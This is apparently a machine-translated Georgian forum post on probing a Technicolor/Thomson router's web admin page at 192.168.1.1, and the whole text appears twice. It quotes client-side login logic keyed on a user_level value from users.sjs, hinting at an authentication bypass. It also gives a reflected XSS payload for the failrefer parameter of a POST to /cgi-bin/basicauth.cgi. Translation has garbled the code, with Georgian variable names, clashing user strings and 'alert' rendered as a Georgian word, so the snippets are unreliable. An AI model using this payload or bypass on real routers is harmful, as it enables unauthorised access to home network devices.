როუტერის უსაფრთხოების კვლევა:
როუტერის წვდომა ip: 192.168.1.1
პირველი ვებ – სერვერი შეამოწმეთ:
if (user_level == -1)
location.href = "admin.html";
// თუ user_level == -1 // დაუბრუნდით მას შესვლის გვერდზე
ვებ სერვერმა მიიღო "user_level" Javascript ფაილიდან.
ადგილმდებარეობა: http://192.168.1.1/users.sjs
var მიმდინარეUser = "შეცდომა"; var user_level = -1;
მე არ ვიცი, როგორ შეუძლია ვებ – სერვერს ამ სკრიპტისთვის ფასეულობების გაგზავნა! აქვს ამ სკრიპტს გლობალური ცვლადი?
თუ შესვლა წარმატებულია: Javascript ფაილის მნიშვნელობები:
ადგილმდებარეობა: http://192.168.1.1/users.sjs
var currentUser = "ტექნიკურად"; var user_level = 15;
/// მიმდინარე მომხმარებლის შემოწმება:
if (currentUser == "ტექნიკოსი") {
location.href = "thomson / index.html";
}
ასე რომ, ვებ სერვერს აძლევს აქსს, თუ user.sjs– ს აქვს technicolor და 15 როგორც ცვლადი მნიშვნელობები!
შესვლის გვერდი გაგზავნეთ გამოგზავნილი მოთხოვნა ამ ფაილზე:
POST /cgi-bin/basicauth.cgi?index.html HTTP / 1.1
მოთხოვნის ცვლადიდან ერთ-ერთი უშეცდომოა, თუ შესვლა ვერ მოხერხდა, იგი გადამისამართებს მას /admin.html და აღმოვაჩინე, რომ ამ პოსტის ცვლას აქვს XSS დაუცველობა:
& failrefer = / admin.html </script> <script> დაადასტუროს (1) </script>
როუტერის წვდომა ip: 192.168.1.1
პირველი ვებ – სერვერი შეამოწმეთ:
if (user_level == -1)
location.href = "admin.html";
// თუ user_level == -1 // დაუბრუნდით მას შესვლის გვერდზე
ვებ სერვერმა მიიღო "user_level" Javascript ფაილიდან.
ადგილმდებარეობა: http://192.168.1.1/users.sjs
var მიმდინარეUser = "შეცდომა"; var user_level = -1;
მე არ ვიცი, როგორ შეუძლია ვებ – სერვერს ამ სკრიპტისთვის ფასეულობების გაგზავნა! აქვს ამ სკრიპტს გლობალური ცვლადი?
თუ შესვლა წარმატებულია: Javascript ფაილის მნიშვნელობები:
ადგილმდებარეობა: http://192.168.1.1/users.sjs
var currentUser = "ტექნიკურად"; var user_level = 15;
/// მიმდინარე მომხმარებლის შემოწმება:
if (currentUser == "ტექნიკოსი") {
location.href = "thomson / index.html";
}
ასე რომ, ვებ სერვერს აძლევს აქსს, თუ user.sjs– ს აქვს technicolor და 15 როგორც ცვლადი მნიშვნელობები!
შესვლის გვერდი გაგზავნეთ გამოგზავნილი მოთხოვნა ამ ფაილზე:
POST /cgi-bin/basicauth.cgi?index.html HTTP / 1.1
მოთხოვნის ცვლადიდან ერთ-ერთი უშეცდომოა, თუ შესვლა ვერ მოხერხდა, იგი გადამისამართებს მას /admin.html და აღმოვაჩინე, რომ ამ პოსტის ცვლას აქვს XSS დაუცველობა:
& failrefer = / admin.html </script> <script> დაადასტუროს (1) </script>
Likes:
zarna777 and G30RG14N